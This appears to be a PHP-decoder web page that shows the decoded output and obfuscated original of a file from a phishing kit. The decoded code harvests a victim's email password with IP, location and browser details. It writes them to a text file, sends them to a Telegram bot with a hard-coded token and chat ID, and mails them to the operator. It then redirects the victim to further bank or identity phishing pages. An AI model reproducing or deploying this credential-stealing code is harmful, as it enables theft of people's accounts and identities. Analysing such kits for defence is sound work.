Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* This file is protected by copyright law and provided under license. Reverse engin..

Decoded Output download


if(isset($_POST['password'])){
include '../mine.php';
include '../bot.php';
session_start();
$msg="=========== <[ -".$scamname."- MAIL ACCESS ]> ===========
";
$msg.="EMAIL		: {$_SESSION['EML']}
";
$msg.="PASS		: {$_POST['password']}
";
$msg.="---------------------- IP Info ----------------------
";
$msg.="IP ADDRESS	: {$_SESSION['ip']}
";
$msg.="LOCATION	: {$_SESSION['ip_city']} , {$_SESSION['ip_countryName']} , {$_SESSION['currency']}
";
$msg.="BROWSER		: {$_SESSION['browser']} on {$_SESSION['os']}
";
$msg.="SCREEN		: {$_SESSION['screen']}
";
$msg.="USER AGENT	: {$_SERVER['HTTP_USER_AGENT']}
";
$msg.="TIMEZONE	: {$_SESSION['ip_timezone']}
";
$msg.="TIME		: ".now()." GMT
";
$msg.="=========== <[ THANKS TO Beluga ]> ===========


";
if ($saveintext=="yes") {
$save=fopen("../../".$filename.".txt","a+");
fwrite($save,$msg);
fclose($save);
}
file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=".urlencode($msg)."");
$api="5236622201:AAEplL_TxotFS1DnWkoUuYX6sfiApMAJs60";
$chatid="-1001670607472";
file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=".urlencode($msg)."");
$subject="-".$scamname."- MAIL ACCESS [".$_SESSION['EML']."] From [".$_SESSION['ip_countryName']."]";
$headers="From: xAthena <[email protected]>
";
$headers.="MIME-Version: 1.0
";
$headers.="Content-Type: text/plain; charset=UTF-8
";
if ($sendtoemail=="yes") {
foreach(explode(",",$yours) as $your){
@mail($your,$subject,$msg,$headers);
}
}
if ($show_bank=="yes") {
exit(header("Location: ../../app/bank"));
}elseif ($show_identity=="yes") {
exit(header("Location: ../../app/identity"));
}else{
exit(header("Location: ../../app/thanks"));
}
}
if(!isset($_POST['password'])){
header('HTTP/1.0 404 Not Found');
}
;

Did this file decode correctly?

Original Code

<?php /* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x98c;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTAzKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCcwKzU2L3JlSVZMM3FSOUR3aG5IcFFURm11R0JORXhVS3RTQ3pKWHZPamxkUDhraXljQTI3ZmdaTXNvYlc0YTFZPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>JHJEChOI{q]c`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o``X

Function Calls

fopen 1
fread 3
strtr 2
fclose 1
urldecode 1
str_replace 1
base64_decode 3

Variables

$O000O0O00 True
$O0O000O00 fgets
$O0O000O0O fgetc
$O0O00OO00 fread
$OO00O0000 2444
$OO00O00O0 if(isset($_POST['password'])){ include '../mine.php'; inclu..
$OOO000000 fg6sbehpra4co_tnd
$OOO00000O strtr
$OOO0000O0 base64_decode
$OOO000O00 fopen
$OOO0O0O00 index.php

Stats

MD5 a21a0811dca688458ce780b96d296880
Eval Count 3
Decode Time 90 ms